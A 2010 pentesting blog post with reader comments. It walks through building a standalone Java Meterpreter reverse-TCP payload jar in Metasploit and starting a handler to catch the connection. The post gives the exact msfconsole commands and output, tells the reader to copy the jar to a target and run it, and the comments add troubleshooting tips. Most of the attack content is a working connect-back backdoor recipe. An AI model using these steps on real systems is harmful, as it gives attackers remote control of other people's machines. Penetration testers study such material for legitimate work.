0x0e.org | pentesting perspective

braindump on pentesting, QA, metasploit, constant learning

Metasploit HowTo: Standalone Java Meterpreter Connect-Back

with 5 comments

Here are some quick notes on how to create a connect-back Java Meterpreter .jar file. The process is very straightforward, simply generate the .jar, setup a handler. Then move the .jar to your target & execute it.

Note! Nightranger’s method to do this is currently out of date (10/17/2010).

Following mihi’s instructions, create the payload:

msf exploit(java_signed_applet) > use test/java_tester
msf exploit(java_tester) > set PAYLOAD java/meterpreter/reverse_tcp
msf exploit(java_tester) > set LHOST 10.0.0.11
msf exploit(java_tester) > set LPORT 4444
msf exploit(java_tester) > exploit
[*] Started reverse handler on 10.0.0.11:4444
[*] Sending stage (26938 bytes) to 10.0.0.11
[*] Meterpreter session 1 opened (10.0.0.11:4444 -> 10.0.0.11:60519) at 2010-10-17 17:50:29 -0500
^C
[*] Exploit completed, but no session was created.
msf exploit(java_tester) > [*] Meterpreter session 1 closed.  Reason: Died
msf exploit(java_tester) > ls
payload.jar

now, set up the handler:

msf exploit(java_tester) > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD java/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 10.0.0.11
msf exploit(handler) > set LPORT 4444
msf exploit(handler) > exploit -j
[*] Exploit running as background job.

copy the payload to the target & run it, and you’re golden. no need to fiddle with classpath or anything, the loader jar is self-contained.

Advertisements

Written by jcran

October 17, 2010 at 11:41 PM

Posted in howto, metasploit

5 Responses

Subscribe to comments with RSS.

  1. Eventually you’ll be able to build the jar with msfpayload or by using the payload in msfconsole.

    egypt

    October 19, 2010 at 2:59 AM

  2. I tried it with Win 7 & Win XP targets, with new Java and with one a year old, it never completes, just hangs at “Sending stage (749056 bytes) to 192.168.1.81.

    I can use the Adobe Cooltype exploit but the JAR one doesn’t work. I am using BackTrack 4 in VMware Workstation.

    Sam Bowne

    October 22, 2010 at 4:54 PM

    • make sure to use the java/meterpreter/reverse_tcp payload, and not windows/meterpreter/reverse_tcp

      jcran

      October 22, 2010 at 11:39 PM

  3. […] Metasploit HowTo: Standalone Java Meterpreter Connect-Back – 0×0e.org The process is very straightforward, simply generate the .jar, setup a handler. […]

  4. note: test modules need to be loaded in now:

    msf exploit(psexec) > loadpath /home/jcran/framework/test/modules

    jcran

    December 16, 2010 at 8:05 PM


Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: